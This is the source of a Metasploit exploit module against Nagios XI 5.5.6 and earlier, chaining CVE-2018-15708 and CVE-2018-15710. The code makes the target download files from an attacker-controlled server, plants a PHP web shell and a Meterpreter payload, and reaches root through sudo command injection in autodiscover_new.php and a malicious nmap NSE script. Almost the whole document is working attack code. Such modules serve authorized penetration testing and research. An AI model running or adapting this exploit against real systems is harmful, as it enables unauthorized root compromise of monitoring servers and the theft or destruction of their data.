/modules/exploits/linux/http/nagios_xi_magpie_debug.rb
Ruby | 246 lines | 201 code | 33 blank | 12 comment | 19 complexity | 68f87f242a20fb0f701c04ca9eeb2127 MD5 | raw file
- ##
- # This module requires Metasploit: https://metasploit.com/download
- # Current source: https://github.com/rapid7/metasploit-framework
- ##
- class MetasploitModule < Msf::Exploit::Remote
- Rank = ExcellentRanking
- include Msf::Exploit::EXE
- include Msf::Exploit::FileDropper
- include Msf::Exploit::Remote::HttpClient
- include Msf::Exploit::Remote::HttpServer::HTML
- prepend Msf::Exploit::Remote::AutoCheck
- def initialize(info = {})
- super(
- update_info(
- info,
- 'Name' => 'Nagios XI Magpie_debug.php Root Remote Code Execution',
- 'Description' => %q{
- This module exploits two vulnerabilities in Nagios XI <= 5.5.6:
- CVE-2018-15708 which allows for unauthenticated remote code execution
- and CVE-2018-15710 which allows for local privilege escalation.
- When combined, these two vulnerabilities allow execution of arbitrary
- commands as root.
- },
- 'License' => MSF_LICENSE,
- 'Author' =>
- [
- 'Chris Lyne (@lynerc)', # Discovery and exploit
- 'Guillaume André (@yaumn_)', # Metasploit module
- 'bcoles', # Additional writable paths and usability/reliability/cleanup fixes
- ],
- 'References' =>
- [
- ['CVE', '2018-15708'],
- ['CVE', '2018-15710'],
- ['EDB', '46221'],
- ['URL', 'https://medium.com/tenable-techblog/rooting-nagios-via-outdated-libraries-bb79427172'],
- ['URL', 'https://www.tenable.com/security/research/tra-2018-37']
- ],
- 'Platform' => 'linux',
- 'Arch' => [ARCH_X86, ARCH_X64],
- 'Targets' =>
- [
- ['Nagios XI <= 5.5.6', { version: Gem::Version.new('5.5.6') }]
- ],
- 'DefaultOptions' =>
- {
- 'RPORT' => 443,
- 'SSL' => true
- },
- 'Privileged' => true,
- 'DisclosureDate' => '2018-11-14',
- 'DefaultTarget' => 0,
- 'Notes' =>
- {
- 'Stability' => [ CRASH_SAFE ],
- 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
- 'Reliability' => [ REPEATABLE_SESSION ]
- }
- )
- )
- register_options([
- OptString.new('RSRVHOST', [true, 'A public IP at which your host can be reached (e.g. your router IP)']),
- OptString.new('RSRVPORT', [true, 'The port that will forward to the local HTTPS server', 8080]),
- OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10])
- ])
- @WRITABLE_PATHS = [
- # writable as 'apache' user
- ['/usr/local/nagvis/share', '/nagvis'],
- # writable as 'apache' user
- ['/var/www/html/nagiosql', '/nagiosql'],
- # writable as 'nagios' group
- ['/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs', '/nagiosxi/includes/components/autodiscovery/jobs'],
- # writable as 'nagios' group
- ['/usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp', '/nagiosxi/includes/components/highcharts/exporting-server/temp'],
- ]
- @writable_path_index = 0
- @webshell_name = "#{Rex::Text.rand_text_alpha(10..12)}.php"
- @meterpreter_name = Rex::Text.rand_text_alpha(10..12)
- end
- def on_request_uri(cli, _req)
- if @current_payload == @webshell_name
- send_response(cli, "<?php system($_GET['cmd'])?>")
- else
- send_response(cli, generate_payload_exe)
- end
- end
- def primer
- path = "#{@WRITABLE_PATHS[@writable_path_index][0]}/#{@current_payload}"
- print_status("Uploading to #{path} ...")
- res = magpie_debug("https://#{datastore['RSRVHOST']}:#{datastore['RSRVPORT']}#{get_resource} -o '#{path}'")
- unless res
- print_error("Could not upload #{@current_payload} to target. No reply.")
- return false
- end
- unless res.code == 200
- print_error("Could not upload #{@current_payload} to target. Unexpected reply (HTTP #{res.code}).")
- return false
- end
- if res.body.include?('Error: MagpieRSS: Failed to fetch')
- print_error("Could not upload #{@current_payload} to target. cURL failed to download the file from our server.")
- return false
- end
- register_file_for_cleanup(path)
- end
- def upload_success?
- res = send_request_cgi(
- {
- 'method' => 'GET',
- 'uri' => normalize_uri("#{@WRITABLE_PATHS[@writable_path_index][1]}/#{@current_payload}")
- }, 5
- )
- unless res
- print_error("Could not access #{@current_payload}. No reply.")
- return false
- end
- unless res.code == 200
- print_error("Could not access #{@current_payload}. Unexpected reply (HTTP #{res.code}).")
- return false
- end
- print_good("#{@current_payload} uploaded successfully!")
- true
- end
- def magpie_debug(url = '')
- send_request_cgi(
- {
- 'method' => 'GET',
- 'uri' => normalize_uri('/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php'),
- 'vars_get' => {
- 'url' => url
- }
- }, 5
- )
- end
- def check
- res = magpie_debug
- unless res
- return CheckCode::Safe('No reply.')
- end
- if res.code == 200 && res.body.include?('MagpieRSS')
- return CheckCode::Appears('Found MagpieRSS.')
- end
- CheckCode::Safe
- end
- def execute_command(cmd, _opts = {})
- send_request_cgi(
- {
- 'uri' => normalize_uri("#{@WRITABLE_PATHS[@writable_path_index][1]}/#{@webshell_name}"),
- 'method' => 'GET',
- 'vars_get' => {
- 'cmd' => cmd
- }
- }, 5
- )
- end
- def exploit
- all_files_uploaded = false
- # Upload PHP web shell and meterpreter to writable directory on target
- for i in 0...@WRITABLE_PATHS.size
- @writable_path_index = i
- for filename in [@webshell_name, @meterpreter_name]
- @current_payload = filename
- begin
- Timeout.timeout(datastore['HTTPDELAY']) { super }
- rescue Timeout::Error
- if !upload_success?
- break
- elsif filename == @meterpreter_name
- all_files_uploaded = true
- end
- end
- end
- if all_files_uploaded
- break
- end
- end
- unless all_files_uploaded
- fail_with(Failure::NotVulnerable, 'Uploading payload failed')
- end
- meterpreter_path = "#{@WRITABLE_PATHS[@writable_path_index][0]}/#{@meterpreter_name}"
- print_status("Checking PHP web shell: #{@WRITABLE_PATHS[@writable_path_index][1]}/#{@webshell_name}")
- res = execute_command('id')
- unless res && res.body.include?('uid=')
- fail_with(Failure::UnexpectedReply, 'PHP web shell did not execute our commands')
- end
- id = res.body.scan(/^(uid=.+)$/).flatten.first
- if id.blank?
- fail_with(Failure::UnexpectedReply, 'PHP web shell did not execute our commands')
- end
- print_good("Success! Commands executed as user: #{id}")
- print_status('Attempting privilege escalation ...')
- nse_path = "/var/tmp/#{Rex::Text.rand_text_alpha(10..12)}.nse"
- register_file_for_cleanup(nse_path)
- # Commands to escalate privileges, some will work and others won't
- # depending on the Nagios version
- cmds = [
- "chmod +x #{meterpreter_path} && sudo php /usr/local/nagiosxi/html/includes/" \
- "components/autodiscovery/scripts/autodiscover_new.php --addresses=\'127.0.0.1/1`#{meterpreter_path}`\'",
- "echo 'os.execute(\"#{meterpreter_path}\")' > #{nse_path} " \
- "&& sudo nmap --script #{nse_path}"
- ]
- # Try to launch root shell
- for cmd in cmds
- vprint_status("Trying: #{cmd}")
- execute_command(cmd)
- break if session_created?
- end
- unless session_created?
- print_error('Privilege escalation failed')
- print_status("Executing payload as #{id} ...")
- execute_command("chmod +x #{meterpreter_path} && #{meterpreter_path}")
- end
- end
- end